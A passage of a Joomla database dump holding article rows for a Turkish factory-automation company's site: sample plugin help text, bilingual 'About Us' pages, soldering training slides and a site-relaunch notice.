Internet and emerging Web technologies, Joomla! required substantial restructuring of its core functionality and we also used this effort to simplify many challenges within the current user interface. Joomla! 1.5 has many new features.</p>\r\n<p style=\"margin-bottom: 0in;\">In Joomla! 1.5, you\'\'ll notice:</p>\r\n<ul>\r\n<li>Substantially improved usability, manageability, and scalability far beyond the original Mambo foundations</li>\r\n<li>Expanded accessibility to support internationalisation, double-byte characters and right-to-left support for Arabic, Farsi, and Hebrew languages among others</li>\r\n<li>Extended integration of external applications through Web services</li>\r\n<li>Enhanced content delivery, template and presentation capabilities to support accessibility standards and content delivery to any destination</li>\r\n<li>A more sustainable and flexible framework for Component and Extension developers</li>\r\n<li>Backward compatibility with previous releases of Components, Templates, Modules, and other Extensions</li>\r\n</ul>','',2,9,'2011-01-01 00:00:01',676,'Joomla! 1.5','2011-01-01 00:00:01',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,0,'','',1,1060,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(68,170,'Captcha','captcha','<p>The Captcha plugins are used to prevent spam submissions on your forms such as registration, contact and login. You basic installation of Joomla includes one Captcha plugin which leverages the ReCaptcha® service but you may install other plugins connecting to different Captcha systems.</p>\r\n<p>Default on:</p>\r\n<ul>\r\n<li>ReCaptcha <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit\">help</a></li>\r\n</ul>\r\n<p>Note: ReCaptcha is a the trademark of Google Inc. and is an independent product not associated with or endorsed by the Joomla Project. You will need to register and agree to the Terms of Service at Recaptcha.net to use this plugin. Complete instructions are available if you edit the ReCaptcha plugin in the Plugin Manager.</p>','',1,25,'2012-01-17 03:20:45',676,'Joomla!','2012-01-17 03:35:46',42,0,'0000-00-00 00:00:00','2012-01-17 03:20:45','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,1,'','',1,1205,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(69,171,'Quick Icons','quick-icons','<p> The Quick Icon plugin group is used to provide notification that updates to Joomla! or installed extensions are available and should be applied. These notifications display on your administrator control panel, which is the page you see when you first log in to your site administrator.</p>\r\n<p>Default on:</p>\r\n<ul>\r\n<li>Quick icon - Joomla! extensions updates notification <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit\">Help</a>.</li>\r\n<li>Quick icon - Joomla! update notification <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit\">Help</a></li>\r\n</ul>','',1,25,'2012-01-17 03:27:39',676,'Joomla!','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-01-17 03:27:39','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,2399,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(70,170,'Smart Search','smart-search','<p>This module provides search using the Smart Search component. You should only use it if you have indexed your content and either have enabled the Smart Search content plugin or are keeping the index of your site updated manually. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help25:Extensions_Module_Manager_Smart_Search\">Help</a>.</p>\r\n<div class=\"sample-module\">{loadmodule finder,Smart Search}</div>','',1,67,'2012-01-17 03:42:36',676,'','2012-01-17 16:15:48',42,0,'0000-00-00 00:00:00','2012-01-17 03:42:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',10,0,'','',1,2227,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(71,183,'About Us','about-us','<h4 style=\"text-align: left;\">Vision</h4>\r\n<h5 style=\"text-align: left;\">To be the best in the field by constantly increasing level of services, know-how and quality.</h5>\r\n<h4 style=\"text-align: left;\">&nbsp;</h4>\r\n<h4 style=\"text-align: left;\">Mission</h4>\r\n<h5 style=\"text-align: left;\">To be a reliable and long-term Complete Factory Automation Solutions Partner for our customers in Turkey and surrounding countries.</h5>\r\n<h4 style=\"text-align: left;\">&nbsp;</h4>\r\n<h4 style=\"text-align: left;\">Our Policies</h4>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Expert in our Field.&nbsp;<br />We strive to be experts in our field - in order to fulfill customers requirements.</h5>\r\n</li>\r\n<li>\r\n<h5>Reliable.&nbsp;<br />Our customers know that our verbal confirmations are sufficient for us to keep our promises.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Different.&nbsp;<br />Even with standard products and services, we provide with differentiating factors for 3S Technologies to be the number #1 choice.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Immediate Action.&nbsp;<br />We take immediate action - both to fulfill customers requirements, as well as to take the necessary internal decisions to apply these.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Respectful.&nbsp;<br />Whatever the circumstances, we act with social responsibility and respect.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Positive.<br />We are positive about the future. When looking at the future, we focus on the opportunities and possibilities.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Determined and Patient.<br />We are determined and patient when taking action.</h5>\r\n</li>\r\n<li>\r\n<h5>Team Work.<br />We understand that we can reach the target only with Teamwork. Therefore, we work strongly and closely with our suppliers and customers.</h5>\r\n</li>\r\n<li>\r\n<h5>Open to New Technologies and Innovation.<br /> We constantly pursue innovation and new technologies. This is the basis of all our activities.</h5>\r\n</li>\r\n</ul>','',1,81,'2014-08-01 08:13:18',676,'','2014-08-02 10:05:36',676,0,'0000-00-00 00:00:00','2014-08-01 08:13:18','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,4,'','',1,7082,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'en-GB','',''),(75,191,'Dalga Lehimleme','dalga-lehimleme','<hr class=\"system-pagebreak\" title=\"1\" />\r\n<p><img src=\"images/egitim/DL_Page_05.jpg\" alt=\"\" width=\"640\" height=\"452\" />&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"2\" />\r\n<p><img src=\"images/egitim/DL_Page_09.jpg\" alt=\"\" width=\"640\" height=\"452\" />&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"3\" />\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;<img src=\"images/egitim/DL_Page_10.jpg\" alt=\"\" width=\"640\" height=\"452\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"4\" />\r\n<p><img src=\"images/egitim/DL_Page_20.jpg\" alt=\"\" width=\"640\" height=\"452\" /></p>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"5\" />\r\n<p><img src=\"images/egitim/DL_Page_25.jpg\" alt=\"\" width=\"640\" height=\"452\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"6\" />\r\n<p><img src=\"images/egitim/DL_Page_26.jpg\" alt=\"\" width=\"640\" height=\"452\" />&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"7\" />\r\n<p><img src=\"images/egitim/DL_Page_57.jpg\" alt=\"\" width=\"640\" height=\"452\" /></p>\r\n<p>&nbsp;&nbsp;</p>','',1,14,'2014-08-03 21:17:52',676,'','2014-08-03 21:27:44',676,0,'0000-00-00 00:00:00','2014-08-03 21:17:52','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,2,'','',1,13157,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(74,190,'Temel Elektronik','temel-elektronik','<hr class=\"system-pagebreak\" title=\"1\" />\r\n<p>&nbsp;</p>\r\n<p><img src=\"images/misc/Temel%20Elektronik_1-1024x724.jpg\" alt=\"\" width=\"640\" height=\"453\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"2\" />\r\n<p><img src=\"images/misc/Temel%20Elektronik_2-1024x724.jpg\" alt=\"\" width=\"640\" height=\"452\" />&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"3\" />\r\n<p>&nbsp;<img src=\"images/misc/Temel%20Elektronik_3-1024x724.jpg\" alt=\"\" width=\"640\" height=\"453\" /></p>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"4\" />\r\n<p>&nbsp;</p>\r\n<p>&nbsp;<img src=\"images/misc/Temel%20Elektronik_4-1024x724.jpg\" alt=\"\" width=\"640\" height=\"453\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"5\" />\r\n<p>&nbsp;<img src=\"images/misc/Temel%20Elektronik_5-1024x724.jpg\" alt=\"\" width=\"640\" height=\"453\" /></p>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"6\" />\r\n<p>&nbsp;<img src=\"images/misc/Temel%20Elektronik_6-1024x724.jpg\" alt=\"\" width=\"640\" height=\"453\" /></p>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"7\" />\r\n<p>&nbsp;</p>\r\n<p><img src=\"images/misc/Temel%20Elektronik_7-1024x724.jpg\" alt=\"\" width=\"624\" height=\"441\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"8\" />\r\n<p><img src=\"images/misc/Temel%20Elektronik_8-1024x724.jpg\" alt=\"\" width=\"624\" height=\"441\" /></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>','',1,14,'2014-08-01 14:47:34',676,'','2014-08-01 14:53:56',676,0,'0000-00-00 00:00:00','2014-08-01 14:47:34','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,3,'','',1,12866,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(72,184,'About Us','hakkimizda','<h4 style=\"text-align: left;\">Vizyon</h4>\r\n<h5 style=\"text-align: left;\">İş hacmi, bilgi ve kaliteyi sürekli arttırarak, ana çalışma konularında sektördeki en iyi firma olmaktır.</h5>\r\n<h4 style=\"text-align: left;\">&nbsp;</h4>\r\n<h4 style=\"text-align: left;\">Misyon</h4>\r\n<h5 style=\"text-align: left;\">Türkiye\'de Elektronik Üreticiler için Güvenilir ve Uzun-vadeli işbirlikleri ile en ileri ve modern teknolojileri Komple Fabrika Otomasyon çözümleri olarak sunmaktır.</h5>\r\n<h4 style=\"text-align: left;\">&nbsp;</h4>\r\n<h4 style=\"text-align: left;\">İlkelerimiz</h4>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Konumuzda uzmanız.&nbsp;<br />Üretim konularında ihtiyaçlara tümüyle cevap verebilecek teknik bilgiye sahibiz.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Güveniliriz.&nbsp;<br />Herkes 3S\'in yazılı olmasa bile sözlerini tutacağını ve faaliyetlerinde sıkıntı yaşamayacağını bilir.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Farklıyız.&nbsp;<br />Standart ürün ve hizmetlerde bile 3S\'in tercih nedeni olmasını sağlayacak bir fark yaratmaya çalışmaktayız.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Hızlıyız.&nbsp;<br />Hem müşterilerin ihtiyaçlarını karşılamada hem de şirket içi karar vermede geç olmadan uygulamaya geçeriz.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Saygılıyız.&nbsp;<br />Şartlar ne olursa olsun, içeride ve dışarıda sosyal saygı kuralları içinde hareket ederiz.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Olumluyuz.&nbsp;<br />Gelecekten umutluyuz. İleriye bakarken öncelikle engelleri değil, fırsat ve olanakları görürüz.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>Kararlı ve Sabırlıyız.&nbsp;<br />Alınan kararların uygulamasında sabırlı ve gayretliyiz.</h5>\r\n</li>\r\n</ul>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<h5>İşbirlikçiyiz.&nbsp;<br />Hedeflerimize tek başına ulaşamayız. Bunun için tedarikçi ve müşterilerimizle ortak bir çalışma içinde ortak anlayışla ilerlememiz gerektiğinin farkındayız.</h5>\r\n</li>\r\n</ul>\r\n<ul>\r\n<li>\r\n<h5 style=\"text-align: left;\">Yeniliklere açığız.&nbsp;<br />Sürekli yenilik peşinde koşmamız gereklidir. Ciromuz büyüse bile bilgi birikimimizin büyümemesi, yeni ürünler veya teknolojide yenilik olmaması, bizim için küçülme anlamına gelir</h5>\r\n</li>\r\n</ul>','',1,80,'2014-08-01 08:13:55',676,'','2014-08-02 10:03:32',676,0,'0000-00-00 00:00:00','2014-08-01 08:13:55','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,9,'','',1,7440,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'tr-TR','',''),(76,192,'Kurşunsuz Lehim','kursunsuz-lehim','<hr class=\"system-pagebreak\" title=\"1\" />\r\n<p>&nbsp;<img src=\"images/egitim/leadfree_Page_03.jpg\" alt=\"\" width=\"640\" height=\"452\" /></p>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"2\" />\r\n<p>&nbsp;</p>\r\n<p><img src=\"images/egitim/leadfree_Page_06.jpg\" alt=\"\" width=\"640\" height=\"452\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"3\" />\r\n<p>&nbsp;<img src=\"images/egitim/leadfree_Page_07.jpg\" alt=\"\" width=\"640\" height=\"452\" /></p>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"4\" />\r\n<p><img src=\"images/egitim/leadfree_Page_08.jpg\" alt=\"\" width=\"640\" height=\"452\" />&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"5\" />\r\n<p>&nbsp;</p>\r\n<p><img src=\"images/egitim/leadfree_Page_09.jpg\" alt=\"\" width=\"640\" height=\"452\" />&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"6\" />\r\n<p><img src=\"images/egitim/leadfree_Page_10.jpg\" alt=\"\" width=\"640\" height=\"452\" /></p>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"7\" />\r\n<p><img src=\"images/egitim/leadfree_Page_11.jpg\" alt=\"\" width=\"640\" height=\"452\" /></p>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"8\" />\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;<img src=\"images/egitim/leadfree_Page_12.jpg\" alt=\"\" width=\"640\" height=\"452\" /></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>','',1,14,'2014-08-03 21:32:46',676,'','2014-08-03 21:39:36',676,0,'0000-00-00 00:00:00','2014-08-03 21:32:46','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,1,'','',1,11159,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(73,185,'Intro','intro','<p><img src=\"images/panasonic/NPM-1.jpg\" alt=\"\" border=\"0\" /></p>','',0,9,'2014-08-01 08:24:06',676,'','2014-08-01 09:16:28',676,0,'0000-00-00 00:00:00','2014-08-01 08:24:06','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,'','',1,52,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(77,193,'Web Sitemiz %100 Yenilendi','web-sitemiz-guencellendi','<p style=\"text-align: left;\">Websitemizi baştan aşağı yeniden tasarladık. Gelişen bileşim teknolojilerine paralel olarak, websitemizi güncelledik. Çok yakında bazı ekipmanlar ve lehim malzemelerinin satınalımlarını da direkt olarak websitemizden kolay bir şekilde yapılması mümkün olacaktır.</p>','',1,80,'2014-08-04 06:37:57',676,'','2014-08-04 06:54:11',676,0,'0000-00-00 00:00:00','2014-08-04 06:37:57','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,8,'','',1,6165,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'tr-TR','',''),(78,194,'Our Website is restructured','web-sitemiz-guencellendi-2','<p style=\"text-align: left;\">We are glad to inform that our website has been %100 restructured. Based on new web technologies being developed, we have also changed our website to follow these trends. Shortly, we will also be providing additional services - such as direct sales of certain equipment as well as soldering material directly from our website.</p>','',1,81,'2014-08-04 06:37:57',676,'','2014-08-04 06:53:42',676,0,'0000-00-00 00:00:00','2014-08-04 06:37:57','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,5,'','',1,3811,'{\"robots\":\"\",\"author\":\"\",\"rights\